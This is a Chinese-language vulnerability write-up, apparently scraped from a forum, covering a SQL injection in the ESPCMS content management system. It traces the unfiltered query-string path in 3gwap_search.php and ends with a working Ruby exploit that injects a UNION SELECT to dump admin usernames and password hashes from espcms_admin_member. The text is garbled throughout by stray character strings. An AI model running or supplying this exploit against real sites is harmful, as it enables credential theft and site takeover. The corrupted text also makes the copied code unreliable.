0×0 漏洞概述0×1 漏洞细节
+ j, V4 d h1 ~& i" l7 V0×2 PoC
. b, w- \1 s9 k6 D0 J- e9 X5 g$ j6 f- V
0 n2 \/ E) E7 y1 C$ X+ ~
& {1 u( D: B8 s4 ^; g% U9 z! @8 B8 H
0×0 漏洞概述
& P( \* i/ r D7 b# ^* A" r0 I* Y4 j2 E, V: A5 V7 j2 J F/ z; D
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
; m& q ^; W; e% V# [7 q: m其在处理传入的参数时考虑不严谨导致SQL注入发生
3 k% ?5 s, m. j$ } [% U5 E \: d7 j: p( }
2 F0 `" h; l5 @9 u6 W+ I
0×1 漏洞细节
! x) O% s- u9 U
) \1 U: i* P5 K3 P变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。! F5 V/ ], z8 T4 h$ u1 c1 ` Y- n
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
. G1 c: S1 C1 H; A5 `而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
, G5 y M* s, L3 ~/ g. O4 |% s- `' E0 O2 T+ r) K0 |
在/interface/3gwap_search.php文件的in_result函数中:4 c$ k$ R! b" G' F1 }& k
4 J2 t; O8 H% ^
# ^/ l z7 n" {+ Q7 ?9 v7 V
$ K `7 ?2 ~# {# B7 T8 d5 a; I+ E; k4 E function in_result() {" e+ K! v4 f6 K' }3 q
... ... ... ... ... ... ... ... ...
w& W J' @& F: v9 \ $urlcode = $_SERVER[ 'QUERY_STRING '];0 d& s0 N n3 V+ M6 W8 j
parse_str(html_entity_decode($urlcode), $output);8 I$ [1 z& k7 E" ^1 X. E/ t0 f7 T
0 E ^) _0 |4 Y, q$ ~4 m ... ... ... ... ... ... ... ... ...9 ~2 w' `$ c& c. Y3 j+ W
if (is_array($output['attr' ]) && count($output['attr']) > 0) {8 m1 o" V: u( P( y
z" S) I) N6 K4 _- \/ [1 y/ n $db_table = db_prefix . 'model_att';: Z6 r5 V) {. }, A) w
* y2 M. E. o3 [: t6 {1 C& u3 z foreach ($output['attr' ] as $key => $value) {/ g+ z, Y) n' i5 x. Y+ n) M
if ($value) {
! @7 k1 h' d) l9 |
& `4 l: R4 k0 H9 _' q $key = addslashes($key);
& j: }, h) p K( I Z0 S } $key = $this-> fun->inputcodetrim($key);7 R# t/ v* c2 d/ m% a8 F/ x( l5 }6 g
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
2 P: a, N/ l5 v8 r* r. ~3 `# j $countnum = $this->db_numrows($db_table, $db_att_where);2 a3 B7 X5 e& j5 {; m$ h
if ($countnum > 0) {
/ W- ?' B ?* o, E! B4 K $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;: K& b. X8 o% X: b u2 Q/ b2 C
}8 a( B' P8 u: [) z! ?& a
}# ?8 m" u+ h$ `" C7 c! s5 F( w; [
}( S( E2 \& T3 |: d
}9 U8 l- |6 ]# ?) R9 O |3 A
if (!empty ($keyword) && empty($keyname)) {7 ]7 S7 {# k" T4 g& c2 x( C
$keyname = 'title';
/ U. g ]: |5 u" C* C9 X8 f $db_where.= " AND a.title like '%$keyword%'" ;' J B4 N4 A6 w( k2 m
} elseif (!empty ($keyword) && !empty($keyname)) {! n. M! c! w3 I J! ?
$db_where.= " AND $keyname like '% $keyword%'";0 E8 V1 J, {2 t9 _
}
0 Q) n$ [) m" p# w1 ]0 z- R $pagemax = 15;
, N& g( }/ _7 X. s" [
9 H3 U! ^3 u' G $pagesylte = 1;- z5 I8 m# x. R& D; k( l
& S9 L" L2 p; U* e. O6 P" z if ($countnum > 0) {
% ?) ]% i3 `' N* P8 l8 p. h b/ I1 V! v1 ~+ T
$numpage = ceil($countnum / $pagemax);" f( S/ j5 z/ r
} else {0 t6 [1 j4 z1 {
$numpage = 1;# q4 o+ B' z! t3 k$ E
}
3 c0 C7 R4 w3 j5 q $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
8 M4 W4 _0 y! D& E! U" _ $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
6 V6 y9 |1 z& L: J* ^9 M$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);8 B0 c. x3 w! R n
... ... ... ... ... ... ... ... ...
" L4 ^0 ]3 \2 p+ i4 z$ S9 d/ I r }
- F$ l" k- N; i; ?8 e* [/ y, D- q& s" d8 c) u7 }7 K) x& p* I
0 `+ y R% w J
0×2 PoC h8 T, f0 x) \# ?
0 ?, \; [% ?9 C2 N% G
/ y, b/ i% g1 g0 M
& P6 o6 s" h# P, erequire "net/http"
# p& O4 ]* C6 X' w' Y; U# o/ C8 J9 B
def request(method, url)
% t/ z& c5 |: E/ Q* m. U if method.eql?("get")0 i$ f$ [% c2 b, ?
uri = URI.parse(url)- N( \3 R- F% `: }/ o! h
http = Net::HTTP.new(uri.host, uri.port)' U8 k; H/ R& L5 G6 q
response = http.request(Net::HTTP::Get.new(uri.request_uri))
3 L. J. T( V# d- \ return response
5 v- K1 ~' K9 j end4 [- e+ j' _1 T* [
end
/ E9 j+ I2 {# B6 O, A: E( I# D" H+ l0 u8 u4 f
doc =<<HERE( V9 E& L/ m( M6 h6 ^
-------------------------------------------------------# }; r! p* r# D- s( ^- [8 U# r
Espcms Injection Exploit% G. D5 \2 T4 @. m# r
Author:ztz
8 X W5 z8 i: O2 v1 K k* @$ KBlog:http://ztz.fuzzexp.org/! A/ ^) F4 a. _! m9 T
-------------------------------------------------------
. E6 }$ E& h# k j; F& z* l y6 |
7 g. g& k/ ~+ \5 }6 N. FHERE
' A, {, x( C7 S$ {( p5 v: O0 w. h7 i
7 l( D/ R* Q j5 `0 ?usage =<<HERE; A5 s* `: q1 U* m/ {6 X. j+ ]
Usage: ruby #{$0} host port path$ O% F- S; x! E6 C3 O: |- }
example: ruby #{$0} www.target.com 80 /
1 K6 w9 ^0 X* A: @& A+ dHERE6 _/ w$ e6 U8 _( v" _) C& C
f1 j* E( O3 pputs doc
5 A0 U6 F I( ]& q$ xif ARGV.length < 3
' H; F$ }' H6 y5 f+ Z9 e puts usage
! m/ c6 v; U1 }# telse/ A7 h1 Z' O Y
$host = ARGV[0]
3 j/ J$ W, m8 Q3 q& t* U: x, ^ $port = ARGV[1]
% m, [+ d2 R+ w7 ~ $path = ARGV[2]
7 ?+ P5 z# \6 k
4 S1 {* A5 c1 X( P3 A puts "send request...": X9 a7 E) {1 q3 z0 W( ]/ G, t4 J
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
H- a4 v4 `' s4 f8 v5 U) uattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
6 z4 z4 y& S! u7 I% @+ {+ N,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27" Z# I0 p; q; b \' J
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
; R" s1 {% G% n3 B0 S response = request("get", url)
( L) r' i; `$ u: Z* n4 x result = response.body.scan(/\w+&\w{32}/)7 \: D3 Z6 D9 [/ M6 J4 b0 I
puts result
9 E5 y) j! H' v; h- ]9 Eend
; \; y z: W- j7 f' i" {+ k
( q" K N! m$ T: d: h+ \3 l |